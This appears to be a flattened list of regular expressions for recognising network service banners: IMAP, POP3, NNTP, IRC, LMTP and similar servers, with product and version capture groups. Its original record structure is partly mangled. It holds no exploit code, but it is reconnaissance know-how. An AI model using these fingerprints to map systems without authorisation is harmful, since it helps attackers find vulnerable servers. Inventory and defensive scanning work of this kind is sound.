([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n 